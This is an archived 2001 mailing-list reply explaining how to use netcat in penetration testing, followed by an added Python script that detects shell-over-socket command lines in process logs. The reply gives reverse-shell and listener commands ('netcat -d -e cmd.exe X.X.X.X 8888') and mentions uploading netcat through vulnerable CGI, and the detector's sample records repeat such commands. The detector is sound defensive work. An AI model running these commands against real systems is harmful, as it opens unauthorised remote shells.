Hi Kartik,

One use is sending a shell back to yourself.

First, upload netcat to a remote server, via unicode, a vulnerable cgi, or various other methods.

Second, on your local computer run netcat in listen mode.

    $ netcat -l -p 8888

Third, execute netcat on the remote server such that it sends a connection back to you. This is assuming that you can execute programs on the remote server. If X is installed on the remote server you can send back an xterm or rxvt, which is a little less complicated.

This command may not be 100% correct; I am in a bit of a rush right now, I apologize.

    netcat -d -e cmd.exe X.X.X.X 8888

(X.X.X.X is your IP)

The netcat listener you set up should display something like this:

    XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX]
    (X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX.

    X:\>

This method can vary several ways. Instead of sending a connection back to your local computer, you can also set up a listener on the remote server, assuming the remote server isn't firewalled.

I am also interested in other ways people use netcat in pen testing. Would anyone else care to share?

-Forrest

Vo0d0o wrote:
> I would be grateful if anybody could throw some light on uses of netcat in
> pen-testing.
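Seen from the defending side, both variants in the message above (a connection sent back to the tester, or a listener left on the remote server) show up as a process command line that hands a shell to `-e`. The following is an added example, not part of the original post: it classifies process-creation records by their arguments, so a renamed netcat binary is still flagged. The `host` and `cmdline` field names are assumptions, and every record, path and address in it is constructed.

```python
import re

# Interpreters whose input/output would be attached to the socket.
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "sh", "bash"}
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def _base(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def classify(cmdline):
    """Return (kind, renamed) for a shell-over-socket command line, else None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if len(tokens) < 3:
        return None
    args = tokens[1:]
    # "-e <program>" is the option from the post that binds a program to the socket.
    if not any(a == "-e" and _base(b) in SHELLS for a, b in zip(args, args[1:])):
        return None
    listening = any(re.fullmatch(r"-[a-z]*l[a-z]*", a) for a in args)
    outbound = any(IPV4.match(a) and b.isdigit() for a, b in zip(args, args[1:]))
    if not (listening or outbound):
        return None
    kind = "bind-shell" if listening else "reverse-shell"
    # Match on arguments, not the image name, so a renamed copy is still caught.
    return kind, _base(tokens[0]) not in NETCAT_NAMES

# Constructed process-creation records (hosts, paths and addresses are made up).
EVENTS = [
    {"host": "web01", "cmdline": r"netcat -d -e cmd.exe 192.0.2.10 8888"},
    {"host": "web01", "cmdline": r'"C:\Temp\upd.exe" -d -e cmd.exe 192.0.2.10 8888'},
    {"host": "web02", "cmdline": r"nc.exe -l -p 4444 -e cmd.exe"},
    {"host": "lab01", "cmdline": r"netcat -l -p 8888"},
    {"host": "web02", "cmdline": r"ping -n 1 192.0.2.10"},
]

def scan(events):
    """Return (host, kind, renamed) for every matching event."""
    found = ((ev["host"], classify(ev["cmdline"])) for ev in events)
    return [(host, *hit) for host, hit in found if hit]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

A plain listener with no `-e` (the `lab01` record) is not flagged; only command lines that attach a shell to the connection are.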
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:55:50 PDT